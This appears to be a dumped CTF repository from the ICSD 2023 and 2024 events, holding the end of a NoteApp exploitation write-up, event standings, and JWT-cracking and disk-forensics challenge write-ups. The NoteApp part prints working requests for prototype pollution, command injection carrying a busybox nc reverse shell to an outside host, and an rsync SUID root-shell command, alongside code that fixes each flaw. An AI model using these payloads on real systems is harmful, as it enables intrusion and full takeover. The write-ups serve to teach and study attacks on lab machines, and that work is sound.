167 | Two things are wrong here. `Object.assign(DefaultUser, user)` mutates the shared `DefaultUser` object instead of a fresh copy (the target should be a new object, e.g. `Object.assign({}, DefaultUser, user)`), and `req.body` is used as-is with no check on which keys it contains. `JSON.parse` turns a `"__proto__"` key in the body into an ordinary own property, so `Object.assign` then assigns it on the target; that invokes the `__proto__` setter and replaces `DefaultUser`'s prototype with our object. The early `user.isAdmin` check is bypassed because `isAdmin` is not a property of the request body itself, but `NewUser.isAdmin` afterwards resolves to `true` through the new prototype.
168 |
169 | ```jsx
170 | PUT /update-user-note/..$'..$'admin$'create-admin-user%3F_method=POSt& HTTP/1.1
171 | Host: noteapp.icsd:8080
172 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
173 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
174 | Accept-Language: en-US,en;q=0.5
175 | Accept-Encoding: gzip, deflate
176 | Connection: close
177 | Upgrade-Insecure-Requests: 1
178 | Content-Type: application/json
179 | Content-Length: 86
180 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo
181 |
182 | {
183 | "username": "admin",
184 | "password":"adminadmin",
185 | "__proto__": { "isAdmin":true
186 | }
187 | }
188 | ```
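The following JavaScript is an added example, not AdminController.js itself: a reduced model of the handler above that keeps its two checks and its `Object.assign(DefaultUser, user)` call, run against the request body from this step, next to a version that copies only expected fields into a fresh object. `SecretCode`, the contents of `DefaultUser` and the function names are assumptions; in particular `DefaultUser` is modelled without an own `isAdmin` field, since an own field would shadow the polluted prototype and the payload above could not have worked.

```javascript
// Added example, not AdminController.js: a reduced model of CreateAdminUser
// and a fixed version. SecretCode, DefaultUser and the names are assumptions.
const SecretCode = 'hypothetical-secret';
// Shared module-level object, as in the app. Modelled without an own isAdmin
// field: an own field would shadow the polluted prototype.
const DefaultUser = { role: 'user' };

// Vulnerable logic: the same two checks and the same Object.assign target.
// Returns true when an admin account would be created.
function createAdminUserVulnerable(rawBody) {
  const user = JSON.parse(rawBody); // a "__proto__" key becomes an own property
  // isAdmin is not an own property of the body, so this never fires for the payload.
  if (user.isAdmin && user.SecretCode !== SecretCode) return false;
  // Object.assign performs DefaultUser["__proto__"] = value, which invokes the
  // __proto__ setter and replaces DefaultUser's prototype with our object.
  const NewUser = Object.assign(DefaultUser, user);
  return Boolean(NewUser.isAdmin);
}

function isPolluted() {
  return Object.getPrototypeOf(DefaultUser) !== Object.prototype;
}

// Fixed logic: copy only expected fields into a fresh object, decide admin
// status from an own property, and never let body keys drive property names.
const ALLOWED = ['username', 'password', 'SecretCode'];
const own = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);
function createAdminUserFixed(rawBody) {
  const body = JSON.parse(rawBody);
  const user = {};
  for (const key of ALLOWED) if (own(body, key)) user[key] = String(body[key]);
  const wantsAdmin = own(body, 'isAdmin') && body.isAdmin === true;
  if (wantsAdmin && user.SecretCode !== SecretCode) return false;
  const NewUser = Object.assign({}, DefaultUser, user, { isAdmin: wantsAdmin });
  return NewUser.isAdmin;
}

// Request body from this step, and an ordinary registration.
const POLLUTING_BODY = '{"username":"admin","password":"adminadmin","__proto__":{"isAdmin":true}}';
const PLAIN_BODY = '{"username":"bob","password":"hunter2"}';
```

Because the vulnerable handler mutates the shared `DefaultUser`, the pollution outlives the request: once the payload has been sent, every later caller of the vulnerable function is treated as an admin as well, which is worth keeping in mind when you leave a machine like this behind for other teams.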
189 |
190 | 
191 |
192 | Let's log in as the newly created admin user.
193 |
194 | ```jsx
195 | PUT /update-user-note/..$'..$'admin$'login-as-admin%3F_method=POST& HTTP/1.1
196 | Host: noteapp.icsd:8080
197 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
198 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
199 | Accept-Language: en-US,en;q=0.5
200 | Accept-Encoding: gzip, deflate
201 | Connection: close
202 | Upgrade-Insecure-Requests: 1
203 | Content-Type: application/json
204 | Content-Length: 49
205 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo
206 |
207 | {
208 | "username": "admin",
209 | "password":"adminadmin"}
210 | ```
211 |
212 | 
213 |
214 | Now we are an admin user. The last step is to abuse the endpoints that only admins can reach.
215 |
216 | 
217 |
218 | The `fileName` value ends up in a shell command, so appending a semicolon lets us chain a command of our own.
219 |
220 | ```jsx
221 | PUT /update-user-note/..$'..$'admin$'delete-profile-photo%3F_method=POST& HTTP/1.1
222 | Host: noteapp.icsd:8080
223 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
224 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
225 | Accept-Language: en-US,en;q=0.5
226 | Accept-Encoding: gzip, deflate
227 | Connection: close
228 | Upgrade-Insecure-Requests: 1
229 | Content-Type: application/json
230 | Content-Length: 43
231 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo
232 | X-Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbklkIjoiY2M3MWU5N2UtNWE3MC00MDQ0LThjMjUtYzFkODczNzM4NzMzIiwiaWF0IjoxNjk2Mjc1NzE2LCJleHAiOjE2OTYyNzkzMTZ9.pdR7ok7Xn-cU3YDZVperWvFTD9TNR789abKJ3QsmtBs
233 |
234 | {
235 | "fileName": "random_file.jpg; whoami"
236 | }
237 | ```
238 |
239 | 
240 |
241 | Using `busybox nc` instead of a bare `nc` seems better opsec to me.
242 |
243 | ```jsx
244 | PUT /update-user-note/..$'..$'admin$'delete-profile-photo%3F_method=POST& HTTP/1.1
245 | Host: noteapp.icsd:8080
246 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
247 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
248 | Accept-Language: en-US,en;q=0.5
249 | Accept-Encoding: gzip, deflate
250 | Connection: close
251 | Upgrade-Insecure-Requests: 1
252 | Content-Type: application/json
253 | Content-Length: 79
254 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo
255 | X-Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbklkIjoiY2M3MWU5N2UtNWE3MC00MDQ0LThjMjUtYzFkODczNzM4NzMzIiwiaWF0IjoxNjk2Mjc1NzE2LCJleHAiOjE2OTYyNzkzMTZ9.pdR7ok7Xn-cU3YDZVperWvFTD9TNR789abKJ3QsmtBs
256 |
257 | {
258 | "fileName": "random_file.jpg; busybox nc 192.168.100.248 53 -e /bin/bash"
259 | }
260 | ```
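Since the handler's body is only visible in the screenshot, the following JavaScript is an added example rather than the application's code: it models the injectable shape (a filename spliced into a shell command string) beside a version that validates the name and deletes the file through the filesystem API with no shell involved. The upload directory and the function names are assumptions, and the unlink function is passed in so the fixed version can be exercised without touching disk.

```javascript
// Added example, not the NoteApp handler: the injectable shape of a
// profile-photo delete and a version that never reaches a shell.
const UPLOAD_DIR = '/var/www/noteapp/uploads'; // assumption

// Vulnerable shape: the request's fileName is spliced into a command string
// (what child_process.exec would run). Returned, not executed, here.
function deleteCommandVulnerable(fileName) {
  return `rm -f ${UPLOAD_DIR}/${fileName}`;
}

// Fixed: accept a bare image filename only (no path separators, no leading
// dot, no shell metacharacters), then remove it with an fs call. The unlink
// function is injected; the app would pass fs.unlinkSync.
const SAFE_NAME = /^[A-Za-z0-9][A-Za-z0-9_-]*\.(jpe?g|png|gif)$/;
function deleteProfilePhotoFixed(fileName, unlinkSync) {
  if (typeof fileName !== 'string' || !SAFE_NAME.test(fileName)) {
    throw new Error('invalid fileName');
  }
  const target = `${UPLOAD_DIR}/${fileName}`;
  unlinkSync(target);
  return target;
}

// Payloads from the requests above, plus a path-traversal variant.
const INJECTED = 'random_file.jpg; busybox nc 192.168.100.248 53 -e /bin/bash';
const TRAVERSAL = '../../etc/passwd';
```

If a shell really is unavoidable, `child_process.execFile` with an argument array (never a single interpolated string) keeps user input out of the shell's parser; the allowlist regex is still needed to stop traversal out of the upload directory.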
261 |
262 | 
263 |
264 | ## Privilege Escalation
265 |
266 | After successfully getting reverse shell, we can go for the privilege escalation.
267 |
268 | ```jsx
269 | find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
270 | ```
271 |
272 | 
273 |
274 | `rsync` has the SUID bit set, so let's look it up on **[GTFOBins](https://gtfobins.github.io/)**. This one command is enough to get a root shell:
275 |
276 | ```jsx
277 | rsync -e 'sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null
278 | ```
279 |
280 | 
281 |
282 | Thank you for Reading!!
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/README.md:
--------------------------------------------------------------------------------
1 | Machine images can be installed from [this link](https://drive.google.com/drive/folders/1mJG_11NPdRdBOJevI7wx_VfH41mm01RS?usp=sharing).
2 |
--------------------------------------------------------------------------------
/Game Of Thrones/README.md:
--------------------------------------------------------------------------------
1 | # 'Game of Thrones' - Capture the Flag
2 |
3 | As PROSOL, we had the opportunity to host the ICSD 2023 conference - an event dedicated to cybersecurity days for the third time! The event was co-hosted by PROSOL and the State Service for Special Communication and Information Security.
4 |
5 | Within the framework of the event, which took place on September 21-23, 2023, a CTF competition in the format of "Game of Thrones" was organized by the hosts. According to the event schedule, the competition took place on September 22 and lasted for 6 hours. Ten teams, each consisting of three members, competed for a prize pool totaling 3000 AZN and additional exciting prizes.
6 |
7 | CyberYashma emerged as the winner of the competition, scoring 220 out of 600 possible points. The second and third place teams (DoublePulsar and ALLSAFE) both achieved a score of 110.
8 |
9 | In this repository, we will share all the materials that we used during the CTF to express our appreciation for open source. Moreover, to support this idea, we have used one easy machine from [vulnhub](https://www.vulnhub.com/entry/election-1,503/) (Callobes)!
10 |
11 | # General Information
12 | 6 vulnerable machines were presented to competitors. Machines were categorized as easy, medium, and hard. Each easy machine provided 50 points, each medium machine 100 points, and each hard machine 150 points, adding up to a total of 600 points. Moreover, competitors were able to access an ELK server where all HTTP logs, as well as each command run on attack boxes, were logged (to read more, please refer to [architecture section](https://github.com/icsd-ctf/ICSD/tree/master/Game%20Of%20Thrones/Architecture/Writeup.md)). This, in theory, should have helped teams find the exact ways other teams exploited the machines and redo the steps to obtain the flags. This way, teams with better overall offensive and defensive skills would come out on top.
13 |
14 | > [!NOTE]
15 | > In addition to the primary challenges, we introduced a secondary challenge: competitors were given the option to destroy the machines (for example delete important system files, block network access etc.) they had successfully exploited. However, there were consequences for this action.
16 | > If other teams detected the destruction of a machine, they would be rewarded with an additional 50 points. On the other hand, the team that destroyed the machine would face a penalty of 20 points and a ban from accessing that specific machine.
17 | > During the CTF, a couple of such incidents occurred where teams did damage the CTF machines. However, none were detected.
18 |
19 |
20 | # Standings
21 |
22 | | Teams/Machines | Callobes | Gitlab | Bytescribe | Captivity | Blitz | Noteapp | Total |
23 | | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: |
24 | | CyberYashma | 20 30 | 20 30 | 30 30 - | 30 30 - | - - - - | - - - | 220 |
25 | | DoublePulsar | 20 30 | - - | 30 30 - | - - - | - - - - | - - - | 110 |
26 | | ALLSAFE | 20 30 | - - | 30 30 - | - - - | - - - - | - - - | 110 |
27 | | CBAR_TEAM | 20 30 | 20 30 | - - - | - - - | - - - - | - - - | 100 |
28 | | ExploitationUnit | 20 30 | 20 30 | - - - | - - - | - - - - | - - - | 50 |
29 |
30 | Unfortunately, the other 5 teams scored 0 points.
31 |
32 | During the competition, several hints were shared at random time intervals for each machine. These hints even included credentials for the gitlab machine in the format root:base64(password) and 2 CVE numbers!
33 |
34 | The fact that five teams were unable to score any points can be primarily attributed to their limited experience in CTF competitions. It's crucial to stress that this environment is simulated and can be quite challenging, not exactly mirroring real-world penetration testing experiences. Consequently, lower scores should not be seen as indicative of anyone's inability to perform penetration tests or blue teaming effectively.
35 |
36 |
37 | # Some moments from the competition
38 |
39 | 
40 | ___
41 | 
42 | ___
43 | 
44 | ___
45 | 
46 | ___
47 | 
48 | ___
49 | 
50 | ___
51 | 
52 | ___
53 | 
54 | ___
55 | 
56 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ICSD
2 |
3 | In this repository, you will find materials from past CTF competitions held during ICSD (International Cyber Security Days) events.
4 |
5 | Previously hosted events:
6 | 1. 2023 - 'Game of Thrones'
7 | 2. 2024 - 'Who Am I'
8 |
--------------------------------------------------------------------------------
/Who Am I/README.md:
--------------------------------------------------------------------------------
1 | # 'Who Am I' - Capture the Flag
2 |
3 | As part of the ICSD 2024 conference, we had the privilege of hosting the Capture the Flag (CTF) competition, Who Am I.
4 |
5 | A total of 20 teams, each consisting of 2-3 participants, competed for a prize pool of 9,000 AZN, with 5,000 AZN awarded to the first-place team, 3,000 AZN to the second, and 1,000 AZN to the third. The competition took place on September 20th, running from 08:30 to 14:15, lasting nearly six hours.
6 |
7 | _Boşver_ emerged as the winner, scoring 1,080 out of a possible 2,100 points. _BHOSploit_ claimed second place with 1,030 points, and _Kabiner_ secured third place with 800 points.
8 |
9 | In this repository, we will share all the challenges used during the competition, along with what we consider to be the correct solutions. Additionally, we will provide statistics on the competitors, teams, and individual questions.
10 |
11 | # General Information
12 | ## Challenges
13 | A total of 12 challenges were presented to the competitors, each consisting of one or more questions, amounting to 31 questions in total.
14 |
15 | Challenges covered various aspects of cybersecurity such as Cryptography, OSINT, Steganography, Log Analysis, Disk Forensics, Penetration Testing and Privilege Escalation. Each challenge was assigned a total score, which was distributed across its questions based on their difficulty level.
16 |
17 |
18 | | Challenge Name | Difficulty | Challenge Score | Question Count | Score for each Question | Covers |
19 | |------------------------------|------------|-----------------|----------------|-----------------------------------|-------------------------------------------|
20 | | **C1: Death Token** | Easy | 100 | 1 | 100 | Cryptography |
21 | | **C2: Decode the Escape** | Easy | 100 | 1 | 100 | Cryptography |
22 | | **C3: ANAIS_WATT3RSON** | Easy | 100 | 1 | 100 | OSINT |
23 | | **C4: #exec cmd= “whoami”** | Easy | 125 | 4 | 25, 30, 30, 40 | Steganography, OSINT |
24 | | **C5: Packet Detective** | Easy | 125 | 9 | 10, 10, 10, 10, 10, 15, 15, 20, 25| Forensics, Packet Analysis |
25 | | **C6: Exorcising Sukuna’s Curse** | Medium | 130 | 2 | 60, 70 | Vulnerability Exploitation |
26 | | **C7: Root Reaper Quest** | Medium | 150 | 1 | 150 | Log Analysis |
27 | | **C8: In Quest for Rogue Dragon** | Medium | 170 | 2 | 100, 70 | Reverse Engineering |
28 | | **C9: End of Rumbling** | Hard | 200 | 2 | 100, 100 | Active Directory Exploitation |
29 | | **C10: Shadows Possession Jutsu** | Hard | 250 | 3 | 100, 75, 75 | Forensics, Disk Analysis |
30 | | **C11: Serial Escape** | Hard | 250 | 3 | 100, 100, 50 | Web Exploitation |
31 | | **C12: Mr. Windoclin** | Hard | 300 | 2 | 150, 150 | Vulnerability Exploitation, Docker Escape |
32 | | **Total** | | **2000** | **31** | | |
33 |
34 | > [!NOTE]
35 | > Some challenges may have included references to films or anime shows, but none required knowledge of them to be solved.
36 |
37 | ## Standings
38 |
39 | > [!IMPORTANT]
40 | > All flag submission attempts (whether correct or incorrect) have been logged and are available in 'ctf_submission_logs.csv' file.
41 |
42 | | N% | Team | C1 | C2 | C3 | C4 | C5 | C6 | C7 | C8 | C9 | C10 | C11 | C12 | Score | Extra | Total |
43 | | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: |
44 | | 1 | boşver | 100 | - | 100 | 125 | 125 | 130 | 150 | - | - | - | 250 | - | 980 | 100 | 1080 |
45 | | 2 | BHOSsploit | 100 | 100 | 100 | 125 | 125 | 130 | - | - | - | - | 100 | 150 | 930 | 100 | 1030 |
46 | | 3 | Kaniber | 100 | - | 100 | 125 | 125 | - | 150 | - | - | - | 100 | - | 700 | 100 | 800 |
47 | | 4 | SUDOERS | 100 | - | - | 85(+++-) | 100(+-+++-+++) | - | 150 | 100(+-) | - | 100(+--) | - | - | 635 | 100 | 735 |
48 | | 5 | 405 Found | - | - | 100 | 125 | 125 | 130 | 150 | - | - | - | - | - | 630 | 100 | 730 |
49 | | 6 | Felina | 100 | 100 | - | 125 | 125 | 130 | - | - | - | - | - | - | 580 | 100 | 680 |
50 | | 7 | R3d3f3nd | 100 | - | 100 | 125 | 110(+++++-+++) | 130 | - | - | - | - | - | - | 565 | 100 | 665 |
51 | | 8 | Zero Zero | - | - | - | 125 | 110(+++++-+++) | 130 | 150 | - | - | - | - | - | 515 | 100 | 615 |
52 | | 9 | ASCCA | - | - | 100 | 125 | 110(+++++-+++) | - | 150 | - | - | - | - | - | 485 | 100 | 585 |
53 | | 10 | Cerberus | - | - | 100 | 125 | 100(+-+++-+++) | 130 | - | - | - | - | - | - | 455 | 100 | 555 |
54 | | 11 | CyberCell | 100 | - | - | 85(+++-) | 110(+++++-+++) | - | 150 | - | - | - | - | - | 445 | 100 | 545 |
55 | | 12 | FR13NDS | 100 | - | - | 85(+++-) | 115(+-+++++++) | 130 | - | - | - | - | - | - | 430 | 100 | 530 |
56 | | 13 | AzInfosec | - | - | - | 125 | 115(+-+++++++) | 130 | - | - | - | - | - | - | 370 | 100 | 470 |
57 | | 14 | Iron First | - | - | - | 85(+++-) | 110(+++++-+++) | - | 150 | - | - | - | - | - | 345 | 100 | 445 |
58 | | 15 | Cyberstars | 100 | - | - | 85(+++-) | 110(+++++-+++) | - | - | - | - | - | - | - | 295 | 100 | 395 |
59 | | 16 | 127.0.0.Biz | - | - | - | 55(+-+-) | 115(+-+++++++) | - | - | - | - | - | - | - | 170 | 100 | 270 |
60 | | 17 | Leet Duo | - | - | - | 85(+++-) | 20(+-+------) | - | - | - | - | - | - | - | 105 | 100 | 205 |
61 | | 18 | Fourier | - | - | - | 85(+++-) | 10(+--------) | - | - | - | - | - | - | - | 95 | 0 | 95 |
62 | | 19 | CyberSpace | - | - | - | 25(+---) | 10(+--------) | - | - | - | - | - | - | - | 35 | 0 | 35 |
63 | | 20 | Overclock | - | - | - | - | - | - | - | - | - | - | - | - | 0 | 0 | 0 |
64 |
65 | > [!NOTE]
66 | > An extra 100 points were awarded for filling in a form about the PROCYBERLAB platform.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/README.md:
--------------------------------------------------------------------------------
1 | **C1 - Death Token Challenge**
2 |
3 | *The Death Token holds twisted truths. Your task is to reconstruct the token by correcting false information hidden in its payload. A mere correction brings you closer to restoring the true power of the token. Can you fix the lies and unlock the token's potential? (Ryuk says it needs to be in JWT format or next token will be named after you)*
4 |
5 | Twisted JWT Token: *eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkZWF0aF90aW1lIjo1MTEyMDA3LCJuYW1lIjoiTCIsImtpbGxlciI6IllhZ2FtaSBMaWdodCIsInF1b3RlIjoiV2hhdCBkbyB5b3UgdGhpbmsgb2YgdGhhdCwgTD8gVGhpcyBpcyBteSBwZXJmZWN0IHZpY3RvcnkhIFRIQVQnUyBSSUdIVCwgSSBXSU4hISEhISEhISEiLCJzdGF0dXMiOiJhbGl2ZSJ9.2AUGVcRFfrZ75xL-3TBNcFuGDEkLTc73jsw0ZKWnKWs*
6 |
7 | 
8 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/Writeup.md:
--------------------------------------------------------------------------------
1 | # C1 - Death Token Challenge
2 |
3 | In this challenge, we are tasked with correcting false data in a JWT token. When we paste the token into jwt.io, we can see it contains information related to characters from the Death Note series:
4 |
5 | 
6 |
7 | First, we cracked the JWT token using the following command:
8 |
9 | `hashcat -a 0 -m 16500 jwt.txt rockyou.txt`
10 |
11 | 
12 |
13 | As we can see, the key is "death". Now, addressing the false data issue—without even knowing the plot, we can spot something suspicious. The name of the character is "L", there is a killer named "Yagami Light", but the status says "alive"? That seems odd. A quick search confirms that Yagami indeed killed L. So, what we need to change in the payload is the status. We update "alive" to "death" (which makes sense, given the key is "death" too):
14 |
15 | 
16 |
17 | And with that, we’ve created the correct token that Ryuk was after. He’s satisfied now, and he’s letting you go… or are you his next source of entertainment?
18 |
19 | 
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/images/image.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image.jpg
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/images/image3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C1 - Death Token Challenge/images/image4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/README.md:
--------------------------------------------------------------------------------
1 | **C10: Shadows Possession Jutsu**
2 |
3 | *A hidden threat lurks in the network, moving like a shadow possession jutsu, silently altering systems. The attacker’s strategy mirrors Shikamaru’s genius—calculated, precise, and hard to trace. As a shinobi investigator, your mission is to uncover the faint trails left behind, crack the coded mysteries like deciphering enemy jutsu, and stop the threat before it spreads like the Akatsuki’s influence. The fate of the network depends on your ability to outwit this unseen adversary—will you illuminate the shadows, or fall prey to their cunning?*
4 |
5 | 
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/Writeup.md:
--------------------------------------------------------------------------------
1 | # C10 - Shadows Possession Jutsu:
2 |
3 | When we start the machine, we notice several tools and a file available:
4 |
5 | - **AccessData FTK Imager**: This tool is used for both acquiring and analyzing image files.
6 | - **HxD**: A tool designed for editing a file's bytes.
7 | - **icsd.001**: Upon examining the headers, we can identify that this is an NTFS file system image.
8 |
9 | 
10 |
11 | However, when we attempt to open the file in FTK Imager, it shows as an unrecognized file system. This could be caused by corrupted header and footer bytes.
12 |
13 | 
14 |
15 | Therefore, we open the file again in HxD and look for header and footer bytes.
16 |
17 | When we look up the header and footer bytes of an NTFS file system, we find that they should be as follows:
18 |
19 | - **Bytes 0x03–0x0A**: Signature "NTFS".
20 | - Last 2 bytes of MBR (first sector of NTFS) should be 55 AA.
21 |
22 | After correcting these bytes with HxD, FTK Imager can identify and analyze the file system. The corrections (offset, found → expected) were:
23 |
24 | - [4] 85 → 54
25 | - [510-511] 22 55 → 55 AA
26 |
27 | 
28 |
29 | After examining the recycle bin and the user desktop, we discovered a **password** and a **ZIP file**. The first assumption is that the password might be used to unlock the ZIP file.
30 |
31 | 
32 |
33 | 
34 |
35 | The content of pw.txt is “hello123”.
36 |
37 | There is also a txt file inside the ZIP archive we found.
38 |
39 | 
40 |
41 | We extract the archive with WinRAR so that we can supply the password, then read the file.
42 |
43 | 
44 |
45 | The answer to the first question is “U2hpbWlzaGFv”.
46 |
47 | 2. The second question is “What malware is used for persistence?”.
48 |
49 | Let's look at the registry autorun keys.
50 |
51 | We need to look at “Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”
52 |
53 | To find that key we need to extract the “C:\Users\icsd\ntuser.dat*” files.
54 |
55 | 
56 |
57 | 
58 |
59 | After viewing that key with Registry Editor, we find the answer is “gh0st.exe”.
60 |
61 | 
62 |
63 | 3. What is the name of the flash disk used to install the malware?
64 |
65 | To find the inserted flash disks we need to look at the “Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet001\Enum\USBSTOR” registry key.
70 |
71 | For that we need to extract the “C:\Windows\system32\config\SYSTEM*” files.
72 |
73 | 
74 |
75 | 
76 |
77 | The answer is “SanDisk”.
78 |
79 | To Sum Up
80 |
81 | Questions:
82 |
83 | 1. What is the content of the data.zip? “U2hpbWlzaGFv”
84 | 2. What malware is used for persistence? “gh0st.exe”
85 | 3. What is the name of the flash disk used to install the malware? “sandisk”
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 10.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 11.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 12.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 9.png:
